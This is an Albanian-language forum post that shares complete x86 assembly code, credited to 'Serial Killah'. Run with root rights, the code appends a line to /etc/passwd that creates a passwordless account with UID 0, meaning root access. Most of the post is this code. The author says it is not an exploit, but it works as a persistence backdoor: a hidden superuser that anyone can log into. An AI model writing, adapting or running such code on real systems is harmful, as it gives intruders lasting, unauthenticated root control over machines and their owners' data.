Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly

  Share
  avatar
  Onyx.
  Administrator
  Administrator

  Posts : 414
  Reputation : 0
  Join date : 23/12/2009

  Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly

  Mesazh nga Onyx. prej Wed Dec 23, 2009 3:58 pm

  Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly]

  --------------------------------------------------------------------------------

  Kodi që është i përfshirë në këtë postim nuk është kod eksploatues për ndonjë prekshmëri, por është thjeshtë mënyrë për shtuarjen e shfrytzuesit në GNU/Linux. Ky kod është i paraparë për procesorët që e kanë IA-32 arkitekturën (pra, familja e x86 procesorëve).


  Kodi:
  # 32 bit asm code written in at&t syntax for the x86 processors wich adds
  # an user with root rights and no password
  # the user is specified as an argument from the command line
  # i didn't implement error checking for the argument so if you get a
  # segfault it's because you haven't typed an argument
  # i added some error checking for the open syscall, if you don't have
  # permission to open it or god knows what else it will exit with 2
  # as it's status code, it doesn't mean anything it's a random number
  # usage ./add username
  # oh one last thing, you must have root rights to do this
  # greets UnPlugged, kiddie, Thugking,ins1der(trixter) and #nerds@undernet
  # coded by Serial Killah mail

  .section .data
  str:
  .ascii "::0:0:owned:/:/bin/sh\n" # modify this as you wish
  file:
  .ascii "/etc/passwd" # if you modify the file name be sure to aldo modify the FLENGTH constant

  .equ FLAGS, 02001 # opens the file in WR_ONLY and APPEND mode
  .equ PERM, 0644 # file permissions
  .equ EXIT, 1 # exit syscall
  .equ WRITE, 4 # write syscall
  .equ OPEN, 5 # i wonder..
  .equ CLOSE, 6 # uhm what could it be
  .equ SYSCALL, 0x80 # the interrupt
  .equ FLENGTH, 11 # file length
  .section .text
  .globl _start
  _start:
  # OPEN THE FILE
  movl $OPEN, %eax # moving the open syscall into %eax
  movl $file, %ebx # moving the address of file into %ebx
  movl $FLAGS, %ecx # moving the write mode into %ecx
  movl $PERM, %edx # opening the file in u=rw,g=r,o=r mode
  int $SYSCALL # waking up the kernel, heh

  cmpl $0, %eax # checking to see if the open syscall worked, if not exiting with a different status
  jle error # jumping to error

  movl %eax, %esi # moving the file descriptor into %esi, or the errno
  pushl 8(%esp) # putting the argument on the stack
  call strlen # calling the strlen function
  addl $4, %esp # removing the argument from the stack

  # WRITE 8(%esp)
  movl %eax, %edx # moving the argument length into %edx
  movl $WRITE, %eax # moving the write syscall into %eax
  movl %esi, %ebx # moving the file descriptor into %ebx
  movl 8(%esp), %ecx # moving the argument into %ecx
  int $SYSCALL # ...

  pushl $str # putting the rest of the string on the stack
  call strlen # again calling the strlen function
  addl $4, %esp # bla bla

  subl $FLENGTH, %eax # substracting the file length from str

  # WRITE $str
  movl %eax, %edx #
  movl $WRITE, %eax # same as above only it's the str we are writing this time
  movl %esi, %ebx #
  movl $str, %ecx #
  int $SYSCALL #

  # CLOSE
  movl $CLOSE, %eax # moving the close syscall into %eax
  int $SYSCALL # %ebx already has the file descriptor so all we have to do is call the interrupt handler

  # EXIT
  movl $EXIT, %eax # moving the exit syscall into %eax
  movl $0, %ebx # 0 is the status code, check it by typing "echo $?"
  int $SYSCALL # calling the interrupt handler

  error:
  movl $1, %eax # same as above
  movl $2, %ebx # the only thing different is that we put 2 as the status code wich means an error
  int $SYSCALL # ..

  .type strlen, @function # declaring strlen as a function
  strlen: # adjusting it's label
  pushl %ebp # pushing %ebp on the stack
  movl %esp, %ebp # moving the stack pointer into %ebp
  movl 8(%ebp), %ebx # puttin whatever it is we pushed on the stack into %ebx
  movl $0, %edi # movingo 0 into %edi
  count: # the place where the counting really happens
  movb (%ebx,%edi,1), %al # moving one byte at a time from %ebx into %al
  cmpb $0, %al # checking these bytes against 0 to see if it's the end of the string
  je exit # if it is then jump to exit
  incl %edi # if not increment edi so we can copy the next byte
  jmp count # and jump to count, the beginning of the loop
  exit: # exiting the function
  movl %edi, %eax # moving the number of bytes (string length) into %eax
  movl %ebp, %esp # moving the base pointer into %esp
  popl %ebp # taking off into %ebp whatever is at %esp
  ret # returning to the main stuffE di që "protected mode" e procesorëve përmbi 80286 bën mbrojtjen e memories, pra nuk lejon të bëhet shkruarja kudo në memoria, por çka e ndalon Assembler kodin nga shkruajtja në qfarëdo lokacioni të hard diskut? Nëse dikush ka nodnjë material/hiperlidhje për këtë gjë, ju lutëm dërgomani.

   Ora është Mon Jun 25, 2018 2:08 am